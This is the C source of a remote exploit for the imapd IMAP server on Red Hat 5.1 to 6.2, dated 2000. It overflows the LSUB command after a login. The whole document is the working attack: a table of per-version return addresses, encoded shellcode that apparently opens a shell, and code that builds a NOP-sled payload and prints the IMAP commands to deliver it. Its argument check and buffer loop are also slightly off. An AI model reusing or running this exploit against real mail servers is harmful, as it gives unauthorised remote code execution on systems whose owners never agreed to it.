Imapd v12.264 remote exploit for Red Hat - Exploits an overflow in the LSUB command, which requires an account. Tested on Red Hat 5.1, 5.2, 6.0, 6.1, and 6.2 with IMAP4rev1 v10.223, v11.241, v12.250, and v12.264.
1542948361aa96f2782cdf5b46132faf343b4b47b03acc2ca5766e95cbac1002
/* Exploit by Narrow <nss@privacyx.com> (29 September 2000) */
#include <stdio.h>
#include <string.h>
struct types {
char *imapver;
unsigned long ret_addr;
int offset;
};
struct types types[] = {
{"Red Hat 6.2 - IMAP4rev1 v12.264",0xbffff2c8,0},
{"Red Hat 6.1 - IMAP4rev1 v12.250",0xbffff2c4,0},
{"Red Hat 6.0 - IMAP4rev1 v12.250",0xbffff2f0,0},
{"Red Hat 5.2 - IMAP4rev1 v11.241",0xbffff320,0},
{"Red Hat 5.1 - IMAP4rev1 v10.223",0xbffff31c,0},
{NULL,0,0}
};
char shellcode[] = /* shellcode from imapx.c */
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
int main(int argc, char **argv)
{
char buf[1064];
int i,type;
if(argc < 3) {
printf("Usage: %s <username> <password> <type>\n\n", argv[0]);
printf("Type:\n");
for(i=0; i<=4; i++) printf("%d - %s\n", i, types[i].imapver);
return 0; } type = atoi(argv[3]);
memset(buf, 0x90, 1032);
memcpy(buf+613, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+613; i<=1064; i+=4)
*(long *)&buf[i] = (unsigned long)types[type].ret_addr - types[type].offset;
printf("1 LOGIN %s %s\r\n", argv[1], argv[2]);
printf("1 LSUB \"\" {1064}\r\n");
for(i=0; i<1064; i++) putchar(buf[i]);
printf("\r\n");
}